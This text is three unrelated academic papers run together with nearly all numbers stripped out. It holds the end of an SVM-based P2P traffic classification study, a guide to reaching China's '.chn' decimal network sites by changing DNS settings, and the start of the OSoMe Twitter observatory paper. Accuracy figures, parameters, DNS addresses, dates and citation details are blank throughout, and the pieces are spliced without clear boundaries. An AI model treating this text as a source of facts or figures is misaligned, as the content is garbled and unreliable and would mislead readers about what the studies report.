, and svm . after training the classifiers svm , svm , and svm , datasete was used as the test sample data set, and experimental results were obtained through the svm classifier. b. finding optimal parameters the algorithm based on the cross-validation idea is used to select an optimal parameter value c for the rbf kernel function and optimal parameters c and r for the training data set. the labels of the two categories are - and , which are iterated times. the trained model is saved in the data.model file. the following information can be obtained from this file: the svm type used for training is c_svm, the kernel function is the radial basis function rbf, the r value is . , the total number of support vectors is , and the value of the decision function constant term b is . . each type of support vector is , , . after the training is completed, the model can be used for svm type prediction. international journal of advanced network, monitoring and controls volume , no. , read the file to be predicted, the model file, and then call the function prediction and output the result to a file. ) after cross test the data, the prediction accuracy is . %. ) when choose the best parameters (c, r), if the cross validation method of grid search is not adopted, the result of cross validation is not adopted with the default value of . according to the method described above, the prediction accuracy is . % obtained by predicting the unknown data through the obtained model. it can be seen that the choice of optimal parameters (c, r) can improve the prediction accuracy of the results. ) repeated training and learning. in order to reflect the learning process of svm, a total of experiments were conducted, by continuously capturing data, the captured data are preprocessed, trained, and predicted. with continuous learning, the accuracy of predictions continues to increase, reaching . %, . %, . %, . %, . %, . %, . %, . %, . % and . % respectively. it can be seen that multiple learning is conducive to classification judgment. however, the learning process also needs to be controlled. excessive learning will bring negative effects on classification. iv. discussion the model obtained after training can be used for svm traffic identification. various p p traffic and accuracy are identified from packet capture, preprocessing, recognition, learning and training, and compared with the recognition accuracy based on the bayesian traffic identification model, the recognition method of the svm has obtained higher accuracy than the original traffic recognition method in practical application.figure shows the comparison of different traffic models. figure . comparison of different models from figure , we can see that for the four kinds of p p traffic in this experiment, the classification and recognition rate of this classifier is all above %, so the effect of this mc-svm classifier on application layer classification of p p traffic is very good. international journal of advanced network, monitoring and controls volume , no. , figure . comparison of stability between bayesian and svm figure is by using a p p traffic recognition model based on bayesian and svm. with the increase of training data sets, the average classification accuracy can still maintain a certain stability, and the accuracy of recognition reaches . %. it can be seen that the recognition method of svm has higher accuracy than the original traffic recognition method in practical application. v. conclusions svm algorithm is suitable for nonlinear time series modeling and prediction, so it can well identify the trend of network traffic changes. this paper conducts empirical experiments on the actual data of network traffic. the results show that, compared with the commonly used prediction methods, the recognition model based on svm can solve the traffic identification. at the same time, it can identify the unknown and large traffic p p types, and has good effect on the identification of encrypted p p traffic, and has higher prediction accuracy and better adaptability. acknowledgements fund support: national natural science foundation, researchonsub-nyquistsamplingofshortpulsesbasedxampli ngundergaborframes, [ ]; shaanxi education department special fund, projectnumber: shaanxi education finance[ ] . references [ ] schulze h, mochalski k. internet study [j]. ipoque gmbh, . [ ] madhukar a, williamson c. a longitudinal study of p p traffic classification[c]// ieee international symposium on modeling, analysis, and simulation of computer and telecommunication systems. ieee, : - . [ ] ma j, levchenko k, kreibich c, et al. unexpected means of protocol inference[c]// acm sigcomm conference on internet measurement. acm, : - . [ ] moore a w, papagiannaki k. toward the accurate identification of network applications[c]// international conference on passive and active network measurement. springer-verlag, : - . [ ] haffner p, sen s, spatscheck o, et al. acas: automated construction of application signatures[c]// acm sigcomm workshop on mining network data. acm, : - . [ ] huang k, zhang q, zhou c, et al. an efficient intrusion detection approach for visual sensor networks based on traffic pattern learning[j]. ieee transactions on systems man & cybernetics systems, , pp( ): - . [ ] yuan r, li z, guan x, et al. an svm-based machine learning method for accurate internet traffic classification[j]. information systems frontiers, , ( ): - . [ ] i ana.internet assigned numbers authority[eb/ol].http: //www.iana.org/assigu mens/port-numbers. [ ] spatscheck o, sen s, wang d. method and apparatus for automatically constructing application signatures: us, us b [p]. . [ ] yang c s, liao m y, luo m y, et al. a network management system based on dpi[c]// international conference on network-based information systems. ieee computer society, : - . [ ] hartigan j a, wong m a. algorithm as : a k-means clustering algorithm[j]. journal of the royal statistical society, , ( ): - . [ ] liu h, yu l. yu, l.: toward integrating feature selection algorithm for classification and clustering. ieee transaction on knowledge and data engineering ( ), - [j]. ieee transactions on knowledge & data engineering, , ( ): - . [ ] pedro s d s. collective intelligence as a source for machine learning self-supervision[c]// international workshop on web intelligence & communities. acm, : . classification accuracy(%) international journal of advanced network, monitoring and controls volume , no. , [ ] chapelle o. semi-supervised learning (adaptive computation and machine learning)[j]. mit pr, . [ ] liu s, dou z t, li f, et al. a new ant colony clustering algorithm based on dbscan[c]// international conference on machine learning and cybernetics. ieee, : - vol. . [ ] este a, gringoli f, salgarelli l. on-line svm traffic classification[c]// wireless communications and mobile computing conference. ieee, : - . [ ] osuna e, freund r, girosi f. training svm: an application to face detection[c]// . [ ] este a, gringoli f, salgarelli l. on-line svm traffic classification[c]// wireless communications and mobile computing conference. ieee, : - . [ ] zhou x. a p p traffic classification method based on svm[c]// international symposium on computer science and computational technology. ieee computer society, : - . [ ] bernaille l, teixeira r, akodkenou i, et al. traffic classification on the fly[j]. acm sigcomm computer communication review, , ( ): - . [ ] jinhuaxu, hongliu. web user clustering analysis based on kmeans algorithm[c]// international conference on information,networking and automation. :v - -v - . [ ] poornalatha g, raghavendra p s. web user session clustering using modified k-means algorithm[m]// advances in computing and communications. springer berlin heidelberg, : - . [ ] wang t z. the development of web log mining based on improve-k-means clustering analysis[m]// advances in computer science and information engineering. springer berlin heidelberg, : - . [ ] ye m, wu j, xu k, et al. identify p p traffic by inspecting data transfer behaviour[j]. computer communications, , ( ): - . [ ] tapaswi s, gupta a s. flow-based p p network traffic classification using machine learning[c]// international conference on cyber-enabled distributed computing and knowledge discovery. ieee, : - . [ ] deng h, yang a m. p p traffic classification method based on svm[j]. computer engineering & applications, . [ ] yang a m, jiang s y, deng h. a p p network traffic classification method using svm[c]// young computer scientists, . icycs . the, international conference for. ieee, : - . [ ] jiang w, wang c z, luo h f, et al. research on a method of p p traffic detection based on svm[j]. journal of hubei university of technology, . [ ] zhu a. a p p network traffic classification method based on c . decision tree algorithm[m]// proceedings of the th international symposium on linear drives for industry applications, volume . springer berlin heidelberg, : - . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a method to access a decimal network (ipv ) resource guangzhou liu, fuya yu xi'an decimal network technology co. ltd xi'an v network research institute co. ltd email: @qq.com abstract—network security is highly valued by world leaders. the current internet technology core is ipv , ipv , completely controlled by the united states. on december , , the us federal communications commission (fcc) formally abolished the net neutrality law. at that time, the internet took on an obvious political color and posed a serious threat to internet applications in various countries. china's economy is already highly dependent on the internet, and if the network is disrupted, the whole country will suffer heavy losses. the decimal network standard working group of the ministry of industry and information technology of china and the decimal network information technology co., ltd of shanghai have been researching on the future network for more than years. developed a complete set of decimal network framework system, completed the future network series research and development with china's independent intellectual property rights, and built the second internet network system besides the united states. the technology has been fully tested in many places and achieved good results, truly achieving the goal of "autonomy, safety, high speed and compatibility". this paper will introduce the method of accessing decimal network resources in the current network environment. keywords-decimal network; chn; domain name; network resources decimal network is a complete independent intellectual property rights based overall decimal digital code, the establishment of times of cyberspace sovereignty. it includes root domain name servers from the parent root, the primary root, and the zero-trust security mechanism for communication after verification. compatible with current internet systems, it has a future internet architecture that overlaps geographical location and ip address space. most internet applications today are based on ipv environments. in the context of the existing internet network, the ipv .chn domain name network can be accessed by setting up the existing computer or terminal. most current computer browsers and mobile browsers support access. for example, firefox, google chrome, microsoft edge, speed browser and so on are common on computers. safari and baidu browser commonly used on mobile phones need to set the network dns and point to the ipv dns server before using the browser to open the website. the addresses are: . . . and . . . . once set up, you can access the resources of the decimal network in the current internet environment. before visiting, a few typical ipv sites are recommended, as shown in table . here are the steps to accessing the .c web site on your pc and mobile phone. international journal of advanced network, monitoring and controls volume , no. , table i. typical chn domain name websites website domain name web resources resource management resources to address http://www.v .chn .chn portal website decimal network standard working group shanghai http://em .chn decimal technology introduction website shanghai decimal network information technology co. ltd shanghai http://www.xav .chn xi 'an decimal system portal xi 'an decimal network technology co. ltd xi 'an http://www.xa.chn v research institute portal xi 'an weijiu research institute co. ltd xi 'an http://www.hqq.chn/ the red flag canal craftsman xi 'an decimal network technology co. ltd xi 'an http://www.zjsjz.chn zhejiang decimal system portal website zhejiang decimal network co. ltd hangzhou http://www.zjbdth.chn beidou day draw beidou tianhua information technology co. ltd hangzhou i. computer access. chn website settings introduce with windows system settings (pc). ) first click the "network" icon on the desktop and select the "properties" option. the interface appears as shown in figure . figure . network and share center setup interface international journal of advanced network, monitoring and controls volume , no. , ) click the "connection: ethernet" option in the network and sharing center setting interface. the interface appears as shown in figure . figure . ethernet status interface ) in the ethernet status interface, click the "properties" button. the dialog box appears as shown in figure . figure . ethernet property interface ) in the ethernet property interface, double-click the option "internet protocol version (tcp/ipv )". the dialog box appears as shown in figure . setting the preferred dns and alternate dns and finished setup. figure . internet protocol version (tcp/ipv ) properties ) open a browser. firefox or google chrome is recommended. enter http://www.hqq.chn in the browser address bar to access the ipv site, as shown in figure . ii. mobile access .chn website at present, there are many types of mobile phones, but the setting method is similar. android mobile phone can download the plug-in (download address: https://www.dtgty.com/homesearch) by flow direct access. but in most cases, access to .chn resources will be more convenient over local wi-fi. it can also be accessed through mobile hotspots, with the same settings as wi-fi and mobile hotspots. take huawei (android system) mobile phone and iphone (ios system) mobile phone as an example to introduce the setting method of mobile dns. international journal of advanced network, monitoring and controls volume , no. , a. huawei mobile phone setting the phone type is huawei mate , android and emui . . . ) click "settings" on the desktop of the mobile phone to display the setting interface, as shown in figure . figure . access the ipv site figure . mobile phone setting interface figure . wireless connection setting interface international journal of advanced network, monitoring and controls volume , no. , ) click "wireless lan" in the interface, and the interface appears as shown in figure . ) press on the connected network name for a while, and additional menu options appear, as shown in figure . click "modify network" menu, the interface of network parameter setting appears, and select "display advanced options", as shown in figure . select the "static" option, as shown in figure . figure . modification of network interface figure . parameter setting interface ) modify dns according to the parameters in the figure. after modification, click "save" button to complete the setting. figure . modification of network interface figure . parameter setting interface ) return to the main interface of the mobile phone and enter http://www.xand.chn in the browser international journal of advanced network, monitoring and controls volume , no. , (firefox or google chrome) to browse the overseas study service website for testing, as shown in figure . the rest are xiaomi phones, vivo phones and so on. you can access ipv network resources by simply setting the dns settings for the connection network. b. iphone parameter setting mobile phone model: iphone xr, system: ios . . ) click "settings" on the desktop of the mobile phone to appear the setting interface. click "wireless lan" in the interface. the interface appears as shown in figure . ) click the icon on the right of the connected wlan, and the network setting interface appears, as shown in figure . figure . interface of wireless lan figure figure . interface of wireless connection parameters figure . dns setting interface ) in the setting interface, select "configure dns" and the dns setting interface appears, as shown in figure . select the add server option and enter the dns address shown in the figure. click the "save" command in the upper right corner of the interface to complete the setup. ) open the browser. enter http://www.xav .chn in the address bar to open the main interface of xi 'an future network, as shown in figure . iii. method of accessing ipv website with chinese domain name in addition to accessing network resources through character domain names, the decimal network system can also use chinese domain names to access, in the format: http:// chinese.*****, but before access to the following settings. take the firefox browser, for example. ) open the firefox browser and click the menu button in the upper right corner to open the browser settings menu, as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . xi 'an future network main interface figure . firefox menu settings screen international journal of advanced network, monitoring and controls volume , no. , ) click the "options" command, drag the right scroll bar to the bottom of the page, and network settings appear, as shown in figure . figure . firefox menu options screen ) click the "settings" button in network settings, and the "connection settings" dialog box appears, as shown in figure . in the configure proxy server to access the internet option, select do not use proxy server (y), and then select enable https dns at the bottom of the screen. finally enter https://doh.zsw .cn/dns.query in the "custom" edit box. ) after setting, click "ok" button to complete setting. enter the chinese domain name "china micro nine research institute" into the firefox browser to access chinese website resources. this is shown in figure . to facilitate test access, several typical ipv sites are recommended, as shown in table . international journal of advanced network, monitoring and controls volume , no. , figure . firefox connection settings screen figure . website of xi 'an v research institute international journal of advanced network, monitoring and controls volume , no. , table ii. typical chinese domain name websites character of the domain name web resources chinese domain name resource management http://www.ijanmc.chn new online international journals http:// in china. new network and detection control xi’an technological university http://www.iccnea.chn iccnea international conference website http:// in china. the international conference on xi’an technological university http://www.xa.chn .chn portal website http:// in china. micro nine research institute xi 'an decimal network company http://www.xav .chn xi 'an decimal system portal http:// in china. xi 'an future network portal xi 'an decimal network company http://www.xand.chn xi 'an norton study abroad website http:// in china. xi 'an norton study abroad xi 'an decimal network company http://www.hqq.chn the red flag canal craftsman http:// in china. the red flag canal craftsman xi 'an decimal network company http://www.xazn.chn the website of zhengnuo conference company the website of zhengnuo conference company xi 'an decimal network company in addition to accessing network resources through character domain names and chinese characters, the decimal address can also be used to access resources. a website corresponds to a decimal address. at the same time, we can also realize a decimal address corresponding to multiple network resources in the way of subdirectory structure. since decimal address access is bound to the computer in the background, setup is cumbersome, and only a presentation interface is provided here, as shown in figure . figure . red flag canal craftsman website international journal of advanced network, monitoring and controls volume , no. , at present the decimal network is in the experimental application stage, although the network resources are less, but the original resources running on the internet can be completely translated to the decimal network system. with the introduction of national policy, the decimal network of resources will be more and more. the decimal network application of china's independent intellectual property rights is bound to enter thousands of households. iv. conclusion this paper introduces the method of using browser to access decimal network resources through personal computer terminal or personal mobile phone under the current internet environment. a simple dns setup is required to point to the decimal server to complete resource access. the setup is very simple, which lays the foundation for a wide range of network applications. reference [ ] xie jianping. a method for assigning addresses to networked computers using full decimal algorithm, chinese patent no. : zl . , . . . [ ] xie jianping. a method for assigning addresses to networked computers using a full decimal algorithm, u.s. patent no. :us: , [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . submitted may accepted august published october corresponding author giovanni luca ciampaglia, gciampag@indiana.edu academic editor silvio peroni additional information and declarations can be found on page doi . /peerj-cs. copyright davis et al. distributed under creative commons cc-by . open access osome: the iuni observatory on social media clayton a. davis , ,*, giovanni luca ciampaglia , ,*, luca maria aiello , keychul chung , michael d. conover , emilio ferrara , alessandro flammini , , , geoffrey c. fox , xiaoming gao , bruno gonçalves , przemyslaw a. grabowicz , kibeom hong , pik-mai hui , , scott mccaulay , karissa mckelvey , mark r. meiss , snehal patil , chathuri peli kankanamalage , valentin pentchev , judy qiu , jacob ratkiewicz , alex rudnick , benjamin serrette , prashant shiralkar , , onur varol , , lilian weng , tak-lon wu , andrew j. younge and filippo menczer , , center for complex networks and systems research, indiana university, bloomington, united states school of informatics and computing, indiana university, bloomington, united states network science institute, indiana university, bloomington, united states bell labs, london, united kingdom linkedin inc., mountain view, ca, united states information sciences institute, university of southern california, marina del rey, ca, united states facebook inc., boston, ma, united states center for data science, new york university, new york, ny, united states max planck institute for software systems saarbrücken, germany, us open data, oakland, ca, united states google inc., mountain view, ca, united states yahoo inc., sunnyvale, ca, united states affirm inc., san francisco, ca, united states amazon inc., seattle, wa, united states * these authors contributed equally to this work. abstract the study of social phenomena is becoming increasingly reliant on big data from online social networks. broad access to social media data, however, requires software development skills that not all researchers possess. here we present the iuni observa- tory on social media, an open analytics platform designed to facilitate computational social science. the system leverages a historical, ongoing collection of over billion public messages from twitter. we illustrate a number of interactive open-source tools to retrieve, visualize, and analyze derived data from this collection. the observatory, now available at osome.iuni.iu.edu, is the result of a large, six-year collaborative effort coordinated by the indiana university network science institute. subjects data science, network science and online social networks, social computing, world wide web and web science keywords social media, observatory, twitter, web science, network science, meme diffusion, computational social science, big data, api, osome introduction the collective processes of production, consumption, and diffusion of information on social media are starting to reveal a significant portion of human social life, yet scientists how to cite this article davis et al. ( ), osome: the iuni observatory on social media. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:gciampag@indiana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://osome.iuni.iu.edu http://dx.doi.org/ . /peerj-cs. struggle to get access to data about it. recent research has shown that social media can perform as ‘sensors’ for collective activity at multiple scales (lazer et al., ). as a consequence, data extracted from social media platforms are increasingly used side-by-side with—and sometimes even replacing—traditional methods to investigate hard-pressing questions in the social, behavioral, and economic (sbe) sciences (king, ; moran et al., ; einav & levin, ). for example, interpersonal connections from facebook have been used to replicate the famous experiment by travers & milgram ( ) on a global scale (backstrom et al., ); the emotional content of social media streams has been used to estimate macroeconomic quantities in country-wide economies (bollen, mao & zeng, ; choi & varian, ; antenucci et al., ); and imagery from instagram has been mined (de choudhury et al., ; andalibi, ozturk & forte, ) to understand the spread of depression among teenagers (link et al., ). a significant amount of work about information production, consumption, and diffusion has been thus aimed at modeling these processes and empirically discriminating among models of mechanisms driving the spread of memes on social media networks such as twitter (guille et al., ). a set of research questions relate to how social network structure, user interests, competition for finite attention, and other factors affect the manner in which information is disseminated and why some ideas cause viral explosions while others are quickly forgotten. such questions have been addressed both in an empirical and in more theoretical terms. examples of empirical works concerned with these questions include geographic and temporal patterns in social movements (conover et al., b; conover et al., a; varol et al., ), the polarization of online political discourse (conover et al., b; conover et al., a; conover et al., ), the use of social media data to predict election outcomes (digrazia et al., ) and stock market movements (bollen, mao & zeng, ), the geographic diffusion of trending topics (ferrara et al., ), and the lifecycle of information in the attention economy (ciampaglia, flammini & menczer, ). on the more theoretical side, agent-based models have been proposed to explain how limited individual attention affects what information we propagate (weng et al., ), what social connections we make (weng et al., ), and how the structure of social and topical networks can help predict which memes are likely to become viral (weng, menczer & ahn, ; weng, menczer & ahn, ; nematzadeh et al., ; weng & menczer, ). broad access by the research community to social media platforms is, however, limited by a host of factors. one obvious limitation is due to the commercial nature of these services. on these platforms, data are collected as part of normal operations, but this is seldom done keeping in mind the needs of researchers. in some cases researchers have been allowed to harvest data through programmatic interfaces, or apis. however, the information that a single researcher can gather through an api typically offers only a limited view of the phenomena under study; access to historical data is often restricted or unavailable (zimmer, ). moreover, these samples are often collected using ad-hoc procedures, and the statistical biases introduced by these practices are only starting to be understood (morstatter et al., ; ruths & pfeffer, ; hargittai, ). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the osome website is also available at truthy.indiana.edu. the original website was created to host our first demo, motivated by the application of social media analytics to the study of ‘‘astroturf,’’ or artificial grassroots social media campaigns orchestrated through fake accounts and social bots (ratkiewicz et al., b). the truthy nickname was later adopted in the media to refer to the entire project. the current website includes information about other research projects on information diffusion and social bots from our lab. a second limitation is related to the ease of use of apis, which are usually meant for software developers, not researchers. while researchers in the sbe sciences are increasingly acquiring software development skills (terna, ; raento, oulasvirta & eagle, ; healy & moody, ), and intuitive user interfaces are becoming more ubiquitous, many tasks remain challenging enough to hinder research advances. this is especially true for those tasks related to the application of fast visualization techniques. a third, important limitation is related to user privacy. unfettered access to sensitive, private data about the choices, behaviors, and preferences of individuals is happening at an increasing rate (tene & polonetsky, ). coupled with the possibility to manipulate the environment presented to users (kramer, guillory & hancock, ), this has raised in more than one occasion deep ethical concerns in both the public and the scientific community (kahn, vayena & mastroianni, ; fiske & hauser, ; harriman & patel, ; vayena et al., ). these limitations point to a critical need for opening social media platforms to researchers in ways that are both respectful of user privacy requirements and aware of the needs of sbe researchers. in the absence of such systems, sbe researchers will have to increasingly rely on closed or opaque data sources, making it more difficult to reproduce and replicate findings—a practice of increasing concern given recent findings about replicability in the sbe sciences (open science collaboration, ). our long-term goal is to enable sbe researchers and the general public to openly access relevant social media data. as a concrete milestone of our project, here we present an observatory on social media—an open infrastructure for sharing public data about information that is spread and collected through online social networks. our initial focus has been on twitter as a source of public microblogging posts. the infrastructure takes care of storing, indexing, and analyzing public collections and historical archives of big social data; it does so in an easy-to-use way, enabling broad access from scientists and other stakeholders, like journalists and the general public. we envision that data and analytics from social media will be integrated within a nation-wide network of social observatories. these data centers would allow access to a broad range of data about social, behavioral, and economic phenomena nationwide (king, ; moran et al., ; difranzo et al., ). our team has been working toward this vision since , when we started collecting public tweets to visualize, analyze, and model meme diffusion networks. the iuni observatory on social media (osome) presented here was launched in early may . it was developed through a collaboration between the indiana university network science institute (iuni, iuni.iu.edu), the iu school of informatics and computing (soic, soic.indiana.edu), and the center for complex networks and systems research (cnets, cnets.indiana.edu). it is available at osome.iuni.iu.edu. data source social media data possess unique characteristics. besides rich textual content, explicit information about the originating social context is generally available. information often includes timestamps, geolocations, and interpersonal ties. the twitter dataset is davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://truthy.indiana.edu https://peerj.com http://iuni.iu.edu http://soic.indiana.edu http://cnets.indiana.edu http://osome.iuni.iu.edu http://dx.doi.org/ . /peerj-cs. research based on this data was deemed exempt from review by the indiana university irb under protocol # . a prototypical example (mckelvey & menczer, b; mckelvey & menczer, a). the observatory on social media is built around a terabyte-scale historical (and ongoing) collection of tweets. the data source is a large sample of public posts made available by twitter through elevated access to their streaming api, granted to a number of academic labs. all of the tweets from this sample are stored, resulting in a corpus of approximately billion public tweets dating back to mid- . an important caveat about the use of these data for research is that possible sampling biases are unknown. when twitter first made this stream available to the research community, it indicated that the stream contains a random % sample of all public tweets. however, no further information about the sampling method was disclosed. other streaming apis have been shown to provide a non-uniform sample (morstatter et al., ). even assuming that tweets are randomly sampled, it should be noted that the collection does not automatically translate into a representative sample of the underlying population of twitter users, or of the topics discussed. this is because the distribution of activity is highly skewed across users and topics (weng et al., ) and, as a result, active users and popular topics are better represented in the sample. sampling biases may also have evolved over time. for example, the fraction of public tweets with exact geolocation coordinates has decreased from approximately % in the past to approximately . % due to the recent change of location privacy settings in twitter mobile clients from ‘‘opt-out’’ to ‘‘opt-in.’’ this change was motivated by public privacy concerns about location tracking. this and other platform changes may significantly affect the composition of our sample in ways that we are unable to assess. the high-speed stream from which the data originates has a rate that ranges in the order of − tweets/day. figure illustrates the growth of the twitter collection over time. system architecture performing analytics at this scale presents specific challenges. the most obvious has to do with the design of a suitable architecture for processing such a large volume of data. this requires a scalable storage substrate and efficient query mechanisms. the core of our system is based on a distributed storage cluster composed of compute nodes, each with × tb disk drives, × gb raid- drives for the operative system, gb ram, and × xeon cpus with cores each ( total per node). access to the nodes is provided via two head nodes, each equipped with gb ram, and ×xeon cpus with four cores each ( total per node), using gb ethernet infiniband. the software architecture the observatory builds upon the apache big data stack (abds) framework (jha et al., ; qiu et al., ; fox et al., ). development has been driven over the years by the need for increasingly demanding social media analytics applications (gao, nachankar & qiu, ; gao & qiu, ; gao & qiu, ; gao et al., ; gao, ferrara & qiu, ; wu et al., in press). a key idea behind our enhancement of the abds architecture is the shift from standalone systems to modules; multiple modules can be used within existing software ecosystems. in particular, we have focused our efforts on enhancing two well-known apache modules, hadoop (the apache software foundation, b) and hbase (the apache software foundation, a). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of monthly messages collected and indexed by osome. system failures have caused occasional interruptions of the collection system. the architecture is illustrated in fig. . the data collection system receives data from the twitter streaming api. data are first stored on a temporary location and then loaded into the distributed storage layer on a daily basis. at the same time, long-term backups are stored on tape to allow recovery in case of data loss or catastrophic events. the design of the nosql distributed db module was guided by the observation that queries of social media data often involve unique constraints on the textual and social context such as temporal or network information. to address this issue, we leveraged the hbase system as the storage substrate and extended it with a flexible indexing framework. the resulting indexedhbase module allows one to define fully customizable text index structures that are not supported by current state-of-the-art text indexing systems, such as solr (the apache software foundation, c). the custom index structures can embed contextualinformation necessaryfor efficientquery evaluation. theindexedhbase software is publicly available (wiggins, gao & qiu, ). the pipelines commonly used for social media data analysis consist of multiple algorithms with varying computation and communication patterns. for example, building the network of retweets of a given hashtag will take more time and computational resources than just counting the number of posts containing the hashtag. moreover, the temporal resolution and aggregation windows of the data could vary dramatically, from seconds to years. a number of different processing frameworks could be needed to perform such a wide range of tasks. to design the analytics module of the observatory we choose hadoop, a standard framework for big data analytics. we use yarn (the apache software foundation, d) to achieve efficient execution of the whole pipeline, and integrate it with indexedhbase. an advantage deriving from this choice is that the overall software stack can dynamically adopt different processing frameworks to complete heterogeneous tasks of variable size. a distributed task queue, and an in-memory key/value store implement the middleware layer needed to submit queries to the backend of the observatory. we use celery (solem & davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart diagram of the osome architecture. arrows indicate flow of data. contributors, ) and redis (sanfilippo, ) to implement such layer. the task queue limits the number of concurrent jobs processed by the system according to the task type (index-only vs. map/reduce) to prevent extreme degradation of performance due to very high load. the observatory user interface follows a modular architecture too, and is based on a number of apps, which we describe in greater detail in the following section. three of the apps (timeline, network visualization, and geographic maps) are directly accessible within osome through web interfaces. we rely on the popular video-sharing service youtube for the fourth app, which generates meme diffusion movies (videos). the movies are rendered using a fast dynamic visualization algorithm that we specifically designed for temporal networks. the algorithm captures only the most persistent trends in the temporal evolution, at the expense of high-frequency churn (grabowicz, aiello & menczer, ). the software is freely available (grabowicz & aiello, ). finally, the observatory provides access to raw data via a programmatic interface (api). applications storing and indexing tens of billions of tweets is of course pointless without a way to make sense of such a huge trove of information. the observatory lowers the barrier of entry to social media analysis by providing users with several ready-to-use, web-based data visualization tools. visualization techniques allow users to make sense of complex data davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of tweets per day about the super bowl (in blue) and the world series (in orange), from september through february . the y -axis is in logarithmic scale, shifted by one to account for null counts. the plot shows two outages in the data collection that occurred around mid-november and mid-january . and patterns (card, ), and let them explore the data and try different visualization parameters (rafaeli, ). in the following, we give a brief overview of the available tools. it is important to note that, in compliance with the twitter terms of service (twitter, inc., ), osome does not provide access to the content of tweets, nor of twitter user objects. however, researchers can obtain numeric object identifiers of tweets in response to their queries. this information can then be used to retrieve tweet content via the official twitter api. (there is one exception, described below.) another necessary step to comply with the twitter terms is to remove deleted tweets from the database. using a redis queue, we collect deletion notices from the public twitter stream, and then feed them to a backend task for deletion. temporal trends the trends tool produces time series plots of the number of tweets including one or more given hashtags; it can be compared to the service provided by google trends, which allows users to examine the interest toward a topic reflected by the volume of search queries submitted to google over time. users may specify multiple terms in one query, in which case all tweets containing any of the terms will be computed; and they can perform multiple queries, to allow comparisons between different topics. for example, let us compare the relative tweet volumes about the world series and the superbowl. we want our super bowl timeline to count tweets containing any of #superbowl, #superbowl , or #sb . since hashtags are case-insensitive and we allow trailing wildcards, this query would be ‘‘ #superbowl*, #sb .’’ adding a timeline for the ‘‘ #worldseries’’ query results in the plot seen in fig. . each query on the trends tool takes – s; this makes the tool especially suitable for interactive exploration of twitter conversation topics. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. diffusion and co-occurrence networks in a diffusion network, nodes represent users and an edge drawn between any two nodes indicates an exchange of information between those two users. for example, a user could rebroadcast (retweet) the status of another user to her followers, or she could address another user in one of her statuses by including a mention to their user handle (mention). edges have a weight to represent the number of messages connecting two nodes. they may also have an intrinsic direction to represent the flow of information. for example, in the retweet network for the hashtag #icebucketchallenge, an edge from user i to user j indicates that j retweeted tweets by i containing the hashtag #icebucketchallenge. similarly, in a mention network, an edge from i to j indicates that i mentioned j in tweets containing the hashtag. information diffusion network, sometimes also called information cascades, have been the subject of intense study in recent years (gruhl et al., ; weng et al., ; bakshy et al., ; weng et al., ; weng, menczer & ahn, ; romero, meeder & kleinberg, ). another type of network visualizes how hashtags co-occur with each other. co- occurrence networks are also weighted, but undirected: nodes represent hashtags, and the weight of an edge between two nodes is the number of tweets containing both of those hashtags. osome provides two tools that allow users to explore diffusion and and co-occurrence networks. interactive network visualization the networks tool enables the visualization of how a given hashtag spreads through the social network via retweets and mentions (fig. ) or what hashtags co-occur with a given hashtag. the resulting network diagrams, created using a force-directed layout (kamada & kawai, ), can reveal topological patterns such as influential or highly-connected users and tightly-knit communities. users can click on the nodes and edges to find out more information about the entities displayed—users, tweets, retweets, and mentions—directly from twitter. network are cached to enable fast access to previously-created visualizations. for visualization purposes, the size of large networks is reduced by extracting their k-core (alvarez-hamelin et al., ) with k sufficiently large to display , nodes or less (k= in the example of fig. ). the use of this type of filter implies a bias toward densely connected portions of diffusion networks, where most of the activity occurs, and toward the most influential participants. the tool allows access to twitter content, such as hashtags and user screen names. this content is available both through the interactive interface itself, and as a downloadable json file. to comply with the twitter terms, the k-core filter also limits the number of edges (tweets). animations because tweet data are time resolved, the evolution of a diffusion or co-occurrence network can be also visualized over time. currently the networks tool visualizes only static networks aggregated over the entire search period specified by the user; we aim to add the ability to observe the network evolution over time, but in the meantime we also provide the movies davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interactive network visualization tool. a detail of the network of retweets and mention for a hashtag commonly linked to ‘‘ice bucket challenge,’’ a popular internet phenomenon from . the size of a node is proportional to its strength (weighted degree). the detail shows the patterns of mention and information broadcasting occurring between celebrities, as the viral challenge was taking off. tool, an alternative service that lets users generate animations of such processes (fig. ). we have successfully experimented with fast visualization techniques in the past, and have found that edge filtering is the best approach for efficiently visualizing networks that undergo a rapid churn of both edges and nodes. we have therefore deployed a fast filtering algorithm developed by our team (grabowicz, aiello & menczer, ). the user-generated videos are uploaded to youtube, and we cache the videos in case multiple users try to visualize the same network. geographic maps online social networks are implicitly embedded in space, and the spatial patterns of information spread have started to be investigated in recent years (ferrara et al., ; conover et al., a). the maps tool enables the exploration of information diffusion through geographic space and time. a subset of tweets contain exact latitude/longitude coordinates in their metadata. by aggregating these coordinates into a heatmap layer superimposed on a world map, one can observe the geographic signature of the attention being paid to a given meme. figure shows an example. our online tool goes one step further, allowing the user to explore how this geographic signature evolves over a specified time period, via a slider widget. it takes at least s to prepare one of these visualizations ex novo. we hope to reduce this lead time with some backend indexing improvements. to enable exploration, we cache all created heatmaps for a period of one week. while cached, the heatmaps can be davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure temporal information diffusion movies. (a) the interface of the movies 